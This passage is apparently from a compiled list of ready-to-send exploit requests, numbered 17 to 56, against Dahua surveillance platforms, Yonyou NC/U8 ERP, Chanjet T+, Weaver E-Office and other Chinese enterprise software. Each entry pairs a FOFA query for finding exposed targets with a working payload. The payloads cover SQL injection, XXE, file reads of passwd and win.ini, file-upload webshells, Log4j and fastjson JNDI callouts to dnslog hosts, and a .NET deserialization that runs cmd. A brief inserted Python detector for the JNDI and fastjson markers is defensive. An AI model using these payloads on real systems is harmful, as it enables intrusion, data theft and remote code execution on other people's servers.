User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
        (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>

18. Dahua DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. Dahua ICC intelligent IoT management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

21. Dahua ICC intelligent IoT management platform random remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
"a":{
 "@type":"com.alibaba.fastjson.JSONObject",
 {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
 }""
}

22. Dahua ICC intelligent IoT management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
 "loginName":"${jndi:ldap://dnslog}"
}

23. Dahua ICC intelligent IoT management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
"a":{
 "@type":"com.alibaba.fastjson.JSONObject",
 {"@type":"java.net.URL","val":"http://DNSLOG"}
 }""
}

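A body-level check for the two markers POCs 21 to 23 rely on, as an added example that is not Dahua's code and not from the original article: a recursive walk over a parsed JSON request body that reports fastjson "@type" autotype keys and Log4j-style "${jndi:...}" lookups, including the nested-lookup obfuscation. Sample bodies are constructed; the fastjson body is rewritten as valid JSON (the key "b" is an assumption) because the POC's original body is not valid JSON, and json.loads rejecting a body is itself worth logging since fastjson is more tolerant than a standards-following parser.

```python
# Added example (not Dahua's or the article's code): walk a parsed JSON
# request body and flag fastjson "@type" keys and "${jndi:...}" lookups,
# the markers used by POCs 21-23. Sample bodies below are constructed.
import json


def looks_like_jndi(value: str) -> bool:
    """Any ${...} lookup that names jndi, or nests a second ${...}
    (nesting is the usual trick for hiding "jndi" from substring rules)."""
    if "${" not in value:
        return False
    low = value.lower()
    return "jndi" in low or low.count("${") > 1


def find_markers(node, path="$"):
    """Return (json_path, kind, value) for every marker under node."""
    findings = []
    if isinstance(node, dict):
        for key, child in node.items():
            if key == "@type":
                findings.append((f"{path}.@type", "fastjson autotype", child))
            findings.extend(find_markers(child, f"{path}.{key}"))
    elif isinstance(node, list):
        for i, child in enumerate(node):
            findings.extend(find_markers(child, f"{path}[{i}]"))
    elif isinstance(node, str) and looks_like_jndi(node):
        findings.append((path, "jndi lookup", node))
    return findings


def inspect_body(raw: str):
    """Parse and walk a request body; an unparseable body is reported
    rather than silently passed, because fastjson accepts shapes that
    json.loads does not (see RAW_POC_BODY)."""
    try:
        doc = json.loads(raw)
    except ValueError:
        return [("$", "unparseable json", raw[:80])]
    return find_markers(doc)


# Constructed samples; LOG4J_BODY copies POC 22, FASTJSON_BODY restates POC 23
# as valid JSON, RAW_POC_BODY is POC 23's body as printed (invalid JSON).
LOG4J_BODY = '{"loginName":"${jndi:ldap://dnslog}"}'
OBFUSCATED_BODY = '{"loginName":"${${::-j}ndi:ldap://dnslog}"}'
FASTJSON_BODY = ('{"a":{"@type":"com.alibaba.fastjson.JSONObject",'
                 '"b":{"@type":"java.net.URL","val":"http://DNSLOG"}}}')
RAW_POC_BODY = ('{"a":{"@type":"com.alibaba.fastjson.JSONObject",'
                '{"@type":"java.net.URL","val":"http://DNSLOG"}}""}')
BENIGN_BODY = '{"loginName":"alice","pageSize":10,"tags":["a","b"]}'

if __name__ == "__main__":
    for name, body in [("log4j", LOG4J_BODY), ("obfuscated", OBFUSCATED_BODY),
                       ("fastjson", FASTJSON_BODY), ("raw_poc", RAW_POC_BODY),
                       ("benign", BENIGN_BODY)]:
        print(name, inspect_body(body))
```

The JSON path in each finding tells an analyst which field was abused (loginName for POC 22), which is what a follow-up hunt over request logs needs.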
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg
------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo endpoint SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
<soapenv:Header/>
  <soapenv:Body>
    <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
      <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
    </ser:getUserNameById>
  </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:22
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
1231
Content-Type: application/octet-stream
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

49. Yonyou U8 CRM system uploadfile.php endpoint arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. 云时空 social commerce ERP system validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPtech (迪普) VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target; it executes a command that writes the given string into the given file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: request the following URL
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the endpoint
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: using the obtained Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
